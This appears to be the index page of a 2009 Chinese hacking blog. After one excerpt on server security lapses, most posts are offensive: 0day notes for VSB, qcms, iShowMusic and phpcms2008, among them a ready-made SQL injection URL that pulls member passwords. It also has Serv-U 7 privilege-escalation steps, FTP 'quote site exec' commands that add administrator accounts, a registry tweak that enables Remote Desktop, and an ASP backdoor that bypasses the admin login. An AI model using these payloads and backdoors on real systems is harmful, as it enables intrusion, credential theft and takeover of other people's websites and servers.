04 四 09 服务器常见安全管理漏洞
企业信息化技术的应用,以不可逆转。随着文件服务器、ERP管理软件等等在企业中生根发芽,应用服务器也逐渐在企业中普及起来。以前在企业中有一台应用服务器已经是了不起的事情,现在有两台、三台的,也不为怪了。 但是,企业应用服务器虽然增加了,可是对这个应用服务器的安全管理,却跟不上。随便到一家企业看看,总是可以看到一些明显的安全管理漏洞。下面笔者就把其中一些典型的漏洞列举出来,就当作抛砖引玉,提醒大家注意服务器的安全管理防止黑客。
一、所有主机可以Telnet到服务器。
由于服务器往往都放在一个特定的空间中,若对于服务器的任何维护工作,如查看服务器的硬盘空间等等,这些工作都需要到服务器上面去查看的话,很明显不是很
服务器常见安全管理漏洞
方便。我们希望能够在我们平时用的电脑上就可以对服务器进行一些日常的维护,而不用跑到存放服务器的房间中去。
所以,我们对于服务器的大部分维护工作,都可以通过Telnet到服务器上,以命令行的方式进行维护。这无疑为我们服务器的管理提供了一个方便的管理渠道,但是,也给服务器带来了一些隐患。
当非法攻击者利用某些特定的方法知道Telent的用户名与密码之后,就可以在企业任何一台主机上畅通无阻的访问服务器。 (全文…)
Tags: 黑客
27 三 09 VSB网站综合管理平台0day
VSB 0day给一个简单的POC:在system/firm/firmreg.jsp文件会产生越权操作行为,导致其注册帐号并上传JSP木马!作者:冰的原点[L.S.T]
Tags: 0day
26 三 09 Qcms1.0漏洞
qcms 0day
qcms 0day漏洞如下:
1.可以下载数据库。
2.注入:
后台的登陆文件
见Login.asp(登陆的判断处理)
代码如下:
admin_name=trim(request.Form(“admin_name”))
(全文…)
24 三 09 Serv-U7 提权
Serv-u7提权
一,su7是提权有几种方式?
有两种形式去干掉su7 ftp服务器。
1>,登陆管理员控制台的页面
==>获取OrganizationId,用于添加用户
==>获取全局用户的“下一个新用户ID”
==>添加用户
==>添加用户的权限 or 添加全局用户权限 (全文…)
23 三 09 myipneighbors恢复ip反查域名了
myipneighbors
今天偶然在打开myipneighbors的时候发现ip反查域名恢复服务了,期盼了好几个月终于等到myipneighbors恢复了,我试着查了一下发现功能没以前缺少了一些.这个网站我在3月7号的介绍几个同ip地址反查域名的网站这篇文章中介绍过.
Tags: 黑客
22 三 09 windows xp和win2003开启3389终端
安全
一个修改注册表无需重新启动开启windows xp 和 win2003 3389终端的方法…开启的REG文件代码如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
(全文…)
Tags: windows xp
22 三 09 iShowMusic V1.2 直接写shell漏洞
安全
iShowMusic在error.php 12-26行复制内容到剪贴板代码:
elseif ($_POST['action']==”save”){
$cknumon && GdConfirm($gdcode);
if(empty($id)) {
Showmsg(“no”,”你还未选择歌曲呢!”,”返回重新填 (全文…)
16 三 09 phpcms2008-0day ask/search_ajax.php注入漏洞
安全
作者:nuke
受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
测试方法:
ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23
16 三 09 ftp命令quote site exec的使用
ftp命令
在获得服务器FTP管理员后可以用quote site exec命令来添加系统管理员,cmd下操作方法如下:quote site exec net user 用户名 密码 /add 添加一个用户
quote site exec net localhost administrators 用户名 /add 把用户添加到系统管理员组
quote site exec tskill PID 在 Windows 2003 中通过 PID 关闭进程
quote site exec tskill notepad 在 Windows 2003 中通过名称关闭同类的进程
quote site exec net stop iisadmin 停止 iis 服务
quote site exec net start iisadmin 启动 iis 服务
14 三 09 WEBSHELL直接进入后台
安全
首先,我们要上传一个木马,通过下载数据库或者其他方法得到管理员的用户名。然后找到一个ASP文件,在其中的之间加上
dim id
id=trim(request(“qwe”))
if id=”120″ then
session(“AdminName”)=”管理员用户名”
end if
然后访问的时候在这个ASP文件后面加上?qwe=120
然后进入后台页面,是不是直接进去了?不用你输入用户名和口令了吧…………这里我们就少了一步(破解MD5密码)
Tags: 黑客
